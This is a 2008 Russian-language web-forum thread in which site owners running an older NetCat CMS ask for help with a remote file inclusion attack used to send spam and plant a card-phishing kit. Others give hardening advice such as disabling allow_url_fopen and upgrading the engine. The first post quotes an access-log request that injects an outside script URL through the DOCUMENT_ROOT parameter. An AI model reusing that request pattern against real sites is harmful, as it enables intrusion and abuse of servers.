Регистрация
Вход через соцсети
Восстановление пароля

Рассылка спама через //index.php и подмену DOCUMENT_ROOT

Новый топик
Страницы: 1  |  2  |  3  |  4
08.07.2008, 10:17
Ответить | Цитировать
Гость
Гость

Все привет!

Давеча обнаружил что кто то шлет 200 тыс. писем спама через один сайт на сервере. Сначала подумал что это бот спамит через форму обратной связи (несмотря на капчу). Проверив и отключив раздел выяснил что поток писем валится дальше. Решил проверить access.log апача и увидел сотни вот таких запросов с разных IP.

41.219.222.173 - - [08/Jul/2008:09:59:45 +0400] "POST //index.php?_SERVER%5bDOCUMENT_ROOT%5d=http://geocities.com/abugag/inbox.txt? HTTP/1.1" 404 22666 "http://www.мойдомен.ru//index.php?_SERVER%5bDOCUMENT_ROOT%5d=http://geocities.com/abugag/inbox.txt?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"

Т. е. видно что через подмену DOCUMENT_ROOT выполняется код //index.php + на чужом серваке - http://geocities.com/abugag/inbox.txt

Кто нить знает как решить проблему?
08.07.2008, 12:10
Ответить | Цитировать
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546

сдается мне, что Вы давно движок не обновляли... сидите нибусь на версии 2.3

Temet nosce...
09.07.2008, 09:28
Ответить | Цитировать
Гость
Гость

Да - данная проблема обнаруживается на Lite и Small Business.

Никто не знает до какой версии нужно обновить чтоб решить проблему?
Или какой скрипт исправить.
09.07.2008, 10:46
Ответить | Цитировать
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546

в файл vars.inc.php добавьте строки:
Код:

$DOCUMENT_ROOT = getenv("DOCUMENT_ROOT");
$HTTP_HOST = getenv("HTTP_HOST");


или укажите значение переменной $DOCUMENT_ROOT явным образом

Temet nosce...
09.07.2008, 16:54
Ответить | Цитировать
Гость
Гость

Директивы прописал, явным образом документ рут оже.
Никакого эффекта - также прет спам. :-(

Интересно что еще может быть такое?
10.07.2008, 10:51
Ответить | Цитировать
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546

Попробуйте обновиться до версии 2.4 лайт. Там добавлен скрипт s_extract.inc.php, который как раз должен вычищать лишний мусор из REQUEST_URI.

Попробуйте поиграться с настройками параметров mail см. тут. Может стоит временно отключить возможность отправки писем.

Temet nosce...
14.07.2008, 10:42
Ответить | Цитировать
sdelali
Сделали.Ру

Зарегистрирован:
2004-12-24
Сообщений: 23

DiGGy писал(а):
Попробуйте обновиться до версии 2.4 лайт. Там добавлен скрипт s_extract.inc.php, который как раз должен вычищать лишний мусор из REQUEST_URI.


А есть вообще в природе такой патч? Если есть - то где взять (Лайт и SB больше не выпускаются вроде).

Попробовал прописать в connect_io.php строку:
include_once $INCLUDE_FOLDER."s_extract.inc.php";

и s_extract.inc.php положить от NetCat 3 - тоже не сработало

счас попробуем от Lite

может где еще есть запросы к s_extract?

Сделали.Ру
14.07.2008, 17:22
Ответить | Цитировать
sdelali
Сделали.Ру

Зарегистрирован:
2004-12-24
Сообщений: 23

Посоветовали так:

Для PHP4 ставим в php.ini:

allow_url_fopen = Off

Для PHP5 ставим в php.ini:

allow_url_fopen = Off

и/или
allow_url_include = Off

Можно к этому добавить еще

safe_mode = On

Но прежде всего (я так полагаю, что включены "глобальные") выключить:

register_globals = Off


Т. е. allow_url_fopen = Off в моем случае решило проблему
но все равно проблема в NetCat - как там обновляться и куда непонятно

Сделали.Ру
14.07.2008, 17:50
Ответить | Цитировать
Pavel

Зарегистрирован:
2007-10-20
Сообщений: 50

письмо от хостера:
Цитата:
на Вашем сайте была размещена мошенническая система
сбора информации о кредитных картах. Файлы этой системы были размещены
на Вашем сайте при помощи установленного у Вас index.php.
Злоумышленники использовали возможность работать с объектами URL, как
с обычными файлами, всвязи с чем эту возможность нам пришлось
отключить:

allow_url_fopen = off

NC 2.2 Small Business - что посоветуете?
14.07.2008, 19:28
Ответить | Цитировать
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546

Советую обновиться до 2.4. Скачать ее можно из личного кабинета (наверное...) Или купить за 360р. Если Вы не являетесь диллером и никак не можете ее купить, то могу Вам ее перепродать. Мои контакты тут

Temet nosce...
15.07.2008, 11:43
Ответить | Цитировать
Pavel

Зарегистрирован:
2007-10-20
Сообщений: 50

allow_url_fopen = off

влияет как то на функционаьность?
198 196 2008-10-04 12:53:48 7473
Страницы: 1  |  2  |  3  |  4
Описание проекта